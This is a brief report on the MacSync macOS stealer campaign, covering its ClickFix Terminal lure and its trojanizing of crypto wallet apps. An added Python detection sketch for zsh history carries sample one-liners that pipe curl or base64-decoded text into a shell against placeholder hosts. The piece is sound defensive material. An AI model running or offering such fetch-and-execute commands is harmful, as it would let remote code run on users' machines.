MacSync is described as a sophisticated macOS malware campaign that relies on social engineering and stealth: it masquerades as a legitimate cloud storage installer to harvest cryptocurrency wallets and credentials. The campaign employs a ClickFix lure that coerces victims into pasting a malicious command into their Terminal to “fix” a fake error or complete an installation.
In observed cases, infection begins on sites that mimic trusted download portals, including a page that resembles a Microsoft login and redirects to a site posing as a legitimate macOS cloud storage installer. The malicious command fetches a remote script that bypasses macOS security features such as Gatekeeper and notarization; the attackers claim to bypass verification by convincing users to execute the shell command.
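A defender-side triage sketch for the ClickFix step described above, added here as an example and not taken from the report or from CloudSEK: it scans zsh history text for one-liners that fetch remote content and hand it straight to a shell. The rule names, the sample history lines and the example.invalid hosts are constructed assumptions, since the page does not give the actual command.

```python
import re

# Constructed sample of ~/.zsh_history content (zsh is the default macOS shell).
# Extended-history entries look like ": <epoch>:<elapsed>;<command>".
SAMPLE_HISTORY = """\
: 1769126400:0;brew install jq
: 1769126460:0;curl -fsSL https://cdn.example.invalid/setup.sh | bash
: 1769126520:0;curl -O https://example.invalid/report.pdf
: 1769126580:0;echo UExBQ0VIT0xERVI= | base64 -D | sh
: 1769126640:0;/bin/zsh -c "$(curl -fsSL https://example.invalid/i)"
ls -la ~/Downloads
"""

SHELL = r"(?:sudo\s+)?(?:/\S*/)?(?:ba|z|da)?sh\b"   # sh, bash, zsh, dash, /bin/zsh ...
FETCH = r"\b(?:curl|wget)\b"
# Hypothetical rule set: each rule is (name, pattern) for one fetch-and-execute shape.
RULES = [
    ("fetch-piped-to-shell", re.compile(FETCH + r"[^|;&]*\|\s*" + SHELL)),
    ("decode-piped-to-shell",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*" + SHELL)),
    ("shell-runs-fetched-text",
     re.compile(SHELL + r"\s+-c\s+[\"']?\$\(\s*" + FETCH)),
]
HIST_PREFIX = re.compile(r"^: (\d+):\d+;")

def parse_history(text):
    """Yield (epoch_or_None, command) for extended and plain zsh history lines."""
    for line in text.splitlines():
        m = HIST_PREFIX.match(line)
        if m:
            yield int(m.group(1)), line[m.end():]
        elif line.strip():
            yield None, line

def flag_commands(text):
    """Return (epoch, [rule names], command) for every command matching a rule."""
    hits = []
    for ts, cmd in parse_history(text):
        names = [name for name, rx in RULES if rx.search(cmd)]
        if names:
            hits.append((ts, names, cmd))
    return hits

if __name__ == "__main__":
    for ts, names, cmd in flag_commands(SAMPLE_HISTORY):
        print(ts, ",".join(names), cmd)
```

A hit is a lead for review, not a verdict: legitimate installers use the same one-liner shape, so pair the timestamp with browser history for the preceding minutes.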
Once inside, MacSync can trojanize Electron-based cryptocurrency apps, overwriting components of Ledger Live or Trezor Suite to present a phishing wizard that captures device PINs and recovery phrases. Victims may later see a “Something went wrong…” screen and be prompted to re-enter their recovery phrase, handing over the keys to their crypto assets. According to CloudSEK, the malware is marketed as a budget-friendly MaaS tool that is gaining traction among lower-tier affiliates due to its price.
23 January 2026